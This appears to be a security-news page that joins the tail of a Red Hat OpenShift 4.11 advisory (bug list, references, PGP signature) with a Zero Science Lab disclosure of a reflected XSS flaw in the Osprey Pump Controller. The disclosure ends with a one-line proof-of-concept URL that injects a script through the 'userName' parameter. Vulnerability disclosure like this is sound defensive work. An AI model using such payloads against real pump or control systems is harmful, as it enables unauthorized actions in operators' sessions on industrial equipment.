updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-6002 - Add more logs to "oc extract" in mco-first boot service   
OCPBUGS-6783 - [release-4.11] gather Machine objects  
OCPBUGS-6879 - Branch name should sanitised to match actual github branch name in repository plr list  
OCPBUGS-7043 - "Delete dependent objects of this resource" might cause confusions  
OCPBUGS-7069 - PipelineRun task status overlaps status text  
OCPBUGS-7127 - Editing Pipeline in the ocp console to get information error  
OCPBUGS-7510 - [release-4.11] fail early on missing node status envs  
OCPBUGS-7539 - Endless rerender loop and a stuck browser on the add and topology page when SBO is installed  
OCPBUGS-7590 - thanos-ruler-user-workload-1 pod is getting repeatedly re-created after upgrade do 4.10.41  
OCPBUGS-7720 - set default timeouts in etcdcli

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zvdzjgjWX9erEAQgaIg//QL3Zh6KgmG6niBw3F41un4n4P0lEM7mA  
xpPA7Rj+M6XXwpyZK5YHl6gffadeqAnbCujJeSpUQPLjsa6oLexldCeFN+GOdyM4  
pjOtkNXTaRyaETO92qcBd94Z2/iz/ZbngCQHiyNjQBzDGlQCwvd3Gs0AO1nb1QNR  
NbWntM13nlOVkPj5c325gCt3A+Zje3J+iQmkSzNt5fgGACEZVQqMRjY8SooZmRIy  
Hm+rGhOXdX1Y9jtm7+b0fGzDss/aAuKtpk5j8HRzOu3XmtLymmtFQJ+GD/axM7wc  
2YMQI7za4+jm6BQN0TVH1i8kUMwpvH4Z79z6jYRqUqqexbSPGPRJiM40kgObt4NH  
fyQjPx12S+tF+TbI5XHLZk2QUM0r4sf/GJ2daZepHN6lfUtoGDw5SpAVPMc5LiL9  
uO2eeY+cAQmrrifRD1kyOhVD9YRoZ8C9jOgHEcq2pPqX1p6s7xXfLfZZrD3T0dcd  
tw1oTblxHZqYzLz++7UKdBgbGT35JfYaovO+iKU6E5/RZBk+yukpcJKp/Utk+1OQ  
G5Qoj5UjWSoMkTjC6ZRlfbRx7zff2QMbrXm7SHw26BV3wbKltaE+/xodt1QyXgew  
Pyh1MizgrCahXUuhLbXCQplPegSvP1yqfJFFkvW3XxaFEZgj7xLOQnJb029daDRg  
h8bP5Bbx5jM=  
=ic5n  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0895-01

Osprey Pump Controller version 1.0.1 suffers from a cross site scripting vulnerability.

    Osprey Pump Controller 1.0.1 Unauthenticated Reflected XSSVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: Input passed to the GET parameter 'userName' is not properly sanitisedbefore being returned to the user. This can be exploited to execute arbitraryHTML/JS code in a user's browser session in context of an affected site.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5751Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5751.php05.01.2023--http://TARGET/index.php?userName=%22%3E%3Cscript%3Econfirm(251)%3C/script%3E

Tag

#mac